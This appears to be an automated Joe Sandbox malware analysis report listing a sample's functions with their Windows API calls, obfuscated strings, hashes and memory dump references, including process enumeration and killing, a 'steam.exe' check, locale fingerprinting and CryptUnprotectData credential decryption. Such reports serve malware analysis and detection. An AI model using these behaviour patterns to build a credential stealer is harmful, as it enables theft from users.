                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: e685e5232c55a758db4878e5eb0d8b6ffb6b1af3a582ee3ec84b5275fe229d67
                                    • Instruction ID: 811a25daf8eae9945520c6e555066c25a09daaf25ec02693b7162197d5cbda33
                                    • Opcode Fuzzy Hash: e685e5232c55a758db4878e5eb0d8b6ffb6b1af3a582ee3ec84b5275fe229d67
                                    • Instruction Fuzzy Hash: 77410A31511A599BCB21EF78CC85FAE7BB4FF44310F044269B948D62A1CF34DC1A8B92
                                    Function 00C7BCAF Relevance: 14.2, Strings: 10, Instructions: 1667COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %<~m$*=^$?q_{$F-=z$SHO}$ZkVw$_9W>$gK$r^o|$z&/
                                    • API String ID: 0-1769550387
                                    • Opcode ID: 92a5e6255002fd51c2e26c6905cb96a7c7e3624b53e6432bff4c79cbdc8cad4c
                                    • Instruction ID: 2107abbfee052679a5ce6221b0bec1e70635fffda7c9b6137a7ebc46cdfc2717
                                    • Opcode Fuzzy Hash: 92a5e6255002fd51c2e26c6905cb96a7c7e3624b53e6432bff4c79cbdc8cad4c
                                    • Instruction Fuzzy Hash: 44B227F39082149FE3046E2DDC4567ABBE5EF94720F1A493DEAC5D3744EA3598048786
                                    Function 008E46C0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008E46D9
                                    • Process32First.KERNEL32(00000000,00000128), ref: 008E46E9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E46FB
                                    • StrCmpCA.SHLWAPI(?), ref: 008E470D
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008E4722
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008E4731
                                    • CloseHandle.KERNEL32(00000000), ref: 008E4738
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E4746
                                    • CloseHandle.KERNEL32(00000000), ref: 008E4751
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 3725817719cf8b3f6f90730303c76ce0b5c2b1f55fd3e4a51a16d36146f33616
                                    • Instruction ID: 0b9eea06cf63248d5a75b7e3836e03d89bb8fe2b0c3d404e9722425bc870f21a
                                    • Opcode Fuzzy Hash: 3725817719cf8b3f6f90730303c76ce0b5c2b1f55fd3e4a51a16d36146f33616
                                    • Instruction Fuzzy Hash: E1018031601118ABE7219BE1DC8DFFB377CEB4AB51F000199F909D5180EF789986CBA1
                                    Function 008E4630 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 008E4648
                                    • Process32First.KERNEL32(00000000,00000128), ref: 008E4658
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E466A
                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 008E4680
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E4692
                                    • CloseHandle.KERNEL32(00000000), ref: 008E469D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                    • String ID: steam.exe
                                    • API String ID: 2284531361-2826358650
                                    • Opcode ID: cadb19d77590226a52254792d0b4e1093607f1f6f930dd0d7d5e655d6180508e
                                    • Instruction ID: 42f894ae8a0ab80148829fe62eb811a050f8b0047cf4341de1b3c30b35463cb8
                                    • Opcode Fuzzy Hash: cadb19d77590226a52254792d0b4e1093607f1f6f930dd0d7d5e655d6180508e
                                    • Instruction Fuzzy Hash: 9F018F716011285BE720DBE1DC49FFB77BCEB1A710F000195E90CD1150EFB49A95CBA0
                                    Function 008E2D00 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008E2D3B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 008E2D4D
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008E2D5A
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008E2D8C
                                    • LocalFree.KERNEL32(00000000), ref: 008E2F6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: bb1a46529993f73be0170589fa0bf48fbd9121c5a69baa6d09a53a1f16963aa9
                                    • Instruction ID: b73468a0c537773b1c5e65f2314bc4d377078150d2bd669dbd04b180ed8dac83
                                    • Opcode Fuzzy Hash: bb1a46529993f73be0170589fa0bf48fbd9121c5a69baa6d09a53a1f16963aa9
                                    • Instruction Fuzzy Hash: 43B14A70900255CFC765CF99C948BA5B7F5FB46328F29C1A9E4099B3A2D7769C82CF80
                                    Function 00C71A83 Relevance: 9.2, Strings: 6, Instructions: 1695COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: az&$*dKw$E!;m$Kiw5$Ni?i$c%\q
                                    • API String ID: 0-3488330453
                                    • Opcode ID: 768c6758841d66ab729926a86987761bd4eaad20143f610fbb884483b65aec3d
                                    • Instruction ID: 235904a72bc36309bae7d2ee66dbed33f5ae42c50068ecf80c7c52c5b97afd82
                                    • Opcode Fuzzy Hash: 768c6758841d66ab729926a86987761bd4eaad20143f610fbb884483b65aec3d
                                    • Instruction Fuzzy Hash: 04B22FF360C2009FE704AE6DEC8567AB7EAEFD4720F16863DE6C4C7744EA3558058692
                                    Function 00C845B5 Relevance: 9.2, Strings: 6, Instructions: 1680COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7 s$c+j{$pJjw${Xj}$8b$4
                                    • API String ID: 0-2819025870
                                    • Opcode ID: eeb9707f41c93ad57b430e9b399f700f84cf4cd3cc8f20183b70fd881c356c32
                                    • Instruction ID: e06163b525c7b5cf4c6fa1a7367fa5ad24245318b0963425f78726704b9ee5dc
                                    • Opcode Fuzzy Hash: eeb9707f41c93ad57b430e9b399f700f84cf4cd3cc8f20183b70fd881c356c32
                                    • Instruction Fuzzy Hash: DFB24AF360C2049FE3046E2DEC85A7BBBDAEFD4620F1A463EE6C4C3744E97558058696
                                    Function 00C7877A Relevance: 9.1, Strings: 6, Instructions: 1587COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %zj$1!wf$6!wt$^_$`qW:$gv%
                                    • API String ID: 0-2456203828
                                    • Opcode ID: db796c84c444a48c63d3f5baf0cfdd0e999a1217ebc658b19a1eeea0d3fd626d
                                    • Instruction ID: 7b728deb03f4e8f7090fc94ca6c95baf19bf439d9f28c6ca7c49f06bb1bfad3a
                                    • Opcode Fuzzy Hash: db796c84c444a48c63d3f5baf0cfdd0e999a1217ebc658b19a1eeea0d3fd626d
                                    • Instruction Fuzzy Hash: 66B2F6F360C2049FE304AE2DDC8567ABBE9EF94720F1A893DE6C4C7744E63598058697
                                    Function 008E2BB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 008E2BE2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E2BE9
                                    • GetTimeZoneInformation.KERNEL32(?), ref: 008E2BF8
                                    • wsprintfA.USER32 ref: 008E2C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID: wwww
                                    • API String ID: 3317088062-671953474
                                    • Opcode ID: 44c172d61ed2675ac74e8b848c42514d2293293dd5ba34be2bc67317570a77fc
                                    • Instruction ID: 13571c45146d31ca73f53cabd11069f1b9b5baf644ab601e97e287c08bc567eb
                                    • Opcode Fuzzy Hash: 44c172d61ed2675ac74e8b848c42514d2293293dd5ba34be2bc67317570a77fc
                                    • Instruction Fuzzy Hash: 9901F771A00604ABC718DFA8DC09F6ABB6DE785B20F104329F915D77C0DB7419008AD5
                                    Function 00C7A256 Relevance: 7.9, Strings: 5, Instructions: 1620COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !c}y$GISt$_$g;$-~u$x[l
                                    • API String ID: 0-359852747
                                    • Opcode ID: 18d0be9a8b54caa971a98a8d3a0e8b93af4e84442e40e126163f8ed59a242b3b
                                    • Instruction ID: 93e8b570535fd0489b2696a3e9b26f494aa61c88f39e9adff509e0d262969f9d
                                    • Opcode Fuzzy Hash: 18d0be9a8b54caa971a98a8d3a0e8b93af4e84442e40e126163f8ed59a242b3b
                                    • Instruction Fuzzy Hash: 3EB25CF3A0C2045FE304AE2DEC85A7BBBD9EF94320F16863DE9C5C3744E97558058696
                                    Function 008C7690 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008C769E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C76A5
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008C76CD
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008C76ED
                                    • LocalFree.KERNEL32(?), ref: 008C76F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 3b42c1ad9c39508d1ebb3d3c78ef955a0e4cabefcc105d1a4ba1f4ce15bffbb1
                                    • Instruction ID: d6aa8f90d21bb68880bef4e8a92a01243334fb8c4e7cc5d5223efbc45d0d546e
                                    • Opcode Fuzzy Hash: 3b42c1ad9c39508d1ebb3d3c78ef955a0e4cabefcc105d1a4ba1f4ce15bffbb1
                                    • Instruction Fuzzy Hash: FA011E75B40308BFEB10DBD49C4AFAA7778EB44B15F104155FB09EB2C0DAB0A901CB94
                                    Function 00C829FA Relevance: 6.7, Strings: 4, Instructions: 1655COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
